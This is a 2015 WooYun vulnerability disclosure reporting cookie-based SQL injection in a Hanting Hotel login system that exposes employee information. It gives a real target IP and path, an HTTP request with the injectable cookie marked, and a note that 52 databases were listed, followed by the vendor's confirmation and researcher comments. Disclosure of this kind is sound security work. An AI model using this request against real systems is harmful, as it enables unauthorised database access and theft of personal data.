
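Vulnerability summary

Bug ID: wooyun-2015-0110936

Title: Cookie injection in a Hanting Hotel (汉庭酒店) system (internal employee information can be obtained)

Vendor: Hanting Hotel (汉庭酒店)

Author: PgHook

Submitted: 2015-04-28 22:40

Fixed: 2015-06-14 12:50

Disclosed: 2015-06-14 12:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]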



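Vulnerability details

Disclosure status:

2015-04-28: Details reported to the vendor; awaiting vendor handling
2015-04-30: Vendor confirmed; details visible to the vendor only
2015-05-10: Details opened to core white hats and experts in related fields
2015-05-20: Details opened to regular white hats
2015-05-30: Details opened to trainee white hats
2015-06-14: Details opened to the public

Brief description:

.......

Detailed description:

Vulnerable site: http://112.65.142.28/HTlogin.aspx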

[Screenshot: w.jpg]


HTTP request:

GET /bbs/login.asp HTTP/1.1
Cookie: %2Fbbs%2FGROUP=12345*; ASPSESSIONIDCSADCQBR=PEEDCNMBDHPPFKKDLEPKCNKD
Referer: http://112.65.142.28:80/bbs/admin_login.asp
Host: 112.65.142.28
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


The %2Fbbs%2FGROUP cookie parameter is vulnerable.

[Screenshot: 9.png]


available databases [52]:


Proof of vulnerability:

[Screenshot: w9.png]

Remediation:

....

Copyright notice: when reposting, please credit the source PgHook@WooYun (乌云)


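Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-04-30 12:49

Vendor reply:

The relevant team has been notified to follow up. Thank you!

Latest status:

None


Vulnerability comments:

Comments

  1. 2015-04-28 22:58 | 专业种田, verified white hat ( core white hat | Rank: 1425, bugs: 182 | There is no most professional farmer, only harder cultivation..........)

    Still invisible? Come out, I won't beat you to death.

  2. 2015-04-28 23:11 | PgHook ( regular white hat | Rank: 964, bugs: 115 | ...........................................)

    @专业种田 Is this being invisible??

  3. 2015-04-29 07:51 | Coody, verified white hat ( core white hat | Rank: 1565, bugs: 189 | No paid jobs, no black-market work; anyone taking jobs or recruiting apprentices is definitely not me...)

    Can you two stop flaunting your affection?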